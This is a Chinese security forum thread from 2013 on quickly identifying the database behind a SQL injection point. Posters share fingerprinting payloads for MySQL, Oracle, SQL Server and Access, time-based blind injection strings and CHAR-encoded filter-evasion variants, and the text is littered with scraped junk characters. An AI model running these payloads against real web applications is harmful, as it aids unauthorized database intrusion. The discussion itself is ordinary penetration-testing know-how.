一个注射点如何最快速确认是什么类型数据库
% t, P- C8 \2 J3 n+ dxsser (十根阳具有长短!!) | 2013-02-05 12:365 x" K: P( k& Y, u! N# Q- O$ c t) G
假设这么一个注射点:
* u' s5 I2 R3 E: B6 {4 Vshow.html?id=2
# i- f! o2 g# j/ k' dmysql:id=2 and version()>0
0 ~& o9 z _$ g$ y; ^/ {oracle:id=2 and '1'||'1'='111 g4 n2 [; V: d7 B7 n& a, P5 `2 x
其他的欢迎补充, p% T, J: A2 t/ K) }" L) o) M
1#
8 |; t- _* F1 m# Z# J, cupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
3 y* B* S7 u$ `, y$ W4 bAccess:& m+ u, k$ F& W4 ^
aNd aSc(cHr(97))=97
; W4 G; c$ A3 `4 ~/ V3 Eand exists(select id from MSysAccessObjects)( f: [( N$ a/ w5 R; ?2 i1 P
SQL Server:8 o! X/ \; @# Q9 [. c) P, K4 U
and exists(select id from sysobjects)
6 l" |/ \. t* W2 x) o* v6 p' aand length(user)>0% h( g5 t0 W8 S% ]4 _
MySQL:
% G$ o- N1 Z% k- I+ F; o$ Gand length(user())>00 C, l% O% I+ a2 e$ _/ c
2#6 K- i W1 C/ y) i+ s
xsser (十根阳具有长短!!) | 2013-02-05 12:48, \* H' T4 z7 @$ Z3 C
@upload 如果这些都不是呢…
) T: Z% O5 {, }- L3#
) j: W# U9 J) {, [4 Aupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
' L' V) \* T+ P@xsser 不快速的,延时注入
s8 g8 F+ \' Y7 P7 z3 g0 Q( Z不知道这样写对不对
* z6 u1 G4 u1 s/ ]; N3 Zmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'& T* m& U0 E& L7 t, t8 P- U
mysql:id=2 and select benchmark(1e8,current_date());+ F' X1 e2 z S& R: |* ~/ Q
4#5 q, \2 G( O% t) ~7 p: J* c3 R
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
* O# }$ F& j" {2 E, w7 a* F最快的貌似是看报错信息) q: |6 x( e: U! [% e0 ^, s
oracle error4 n- l6 b, h2 Q& S9 [# V
mssql error
, J9 @) ^5 ~ X$ umysql error, @5 Z) b( o& h Z& d0 w
5#
8 B M) o9 D* u1 mNimda (你们都是坏银~) | 2013-02-05 13:144 X( C: K" [( e5 Y
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
; s5 ~- X* T8 m, y/ \6#
/ E' A( R5 H- h, S# P/ dupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
; J. {9 m. G% |$ r2 ?“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:8 ?+ {( o3 b# u g
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
% p8 S; H4 p% l+ T4 G1 h“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。* O/ d. Y% E/ Y e" x _ W
7#0 w: S% c O2 w: P
_Evil (HackEnd) | 2013-02-05 13:339 u. m$ @: ? X- v
PostgreSQL, m$ R* H9 ?# f9 ~
8#: G$ q% v; e3 I: m, j) n" x, H
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
. Y6 f8 B9 O4 ]; u0 e切换编码 and 1=1
W; C3 @/ }' |- @$ Q; H% \oracle:' c2 U/ _& e$ u9 T4 u+ {
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)" `5 ?+ |4 x* `) t
mssql:7 l+ \5 ?, @6 B( Y6 |) Y7 c
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)3 Z: I% r- D# J, [- U3 r9 I i
mysql:
/ k" p2 O* p$ G2 z" {) U% ?CHAR(97, 110, 100, 32, 49, 61, 49); `" P; ~( e( m
9#
7 _: r" m6 v( m- j2 z0 ~4 gxsser (十根阳具有长短!!) | 2013-02-05 14:31
0 `2 \6 W) P/ D1 }+ \1 K2 A- d$ k@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
) a B# {( H4 v# Y6 ^10#
3 `, N, [' k4 V' \& k* J0 o0 hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
! b0 ]0 l& v1 E8 O y@xsser 是奇葩数据库类型的么?" K5 Y. h- Z/ s, ]7 g( O
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
; Q, ^% n5 i5 N4 s1 o2 Z) R1.是否可以使用特定的函数来判断,该数据库特有的8 e1 o+ J4 N, z* `) G. Z
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
F3 q4 w8 p+ L# `: }, {3.是否可以编码查询
# S8 B* g! \! v5 J5 ]' n4.是否显可以利用错信息5 g" K6 @& T( P6 H* M4 h
5.是否存在数据库某些特性辅助判断8 D0 ?1 U! j* x, X
个人见解
3 a2 j- e& B4 Z11#- L1 @& }& a" S" p6 E/ }1 v+ M
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55( L1 t9 a; T" `+ W! B% s
已收藏,mssql可以直接看到错误提示的吧~
: h x, T( m2 y+ g8 O+ K1 y12#
$ A, ]# H8 E# t- D4 ZPasser_by | 2013-02-05 15:09, S3 @# h/ f; U3 M+ l2 }3 o
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
. `) p' Z" d' z% o0 y9 ffrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对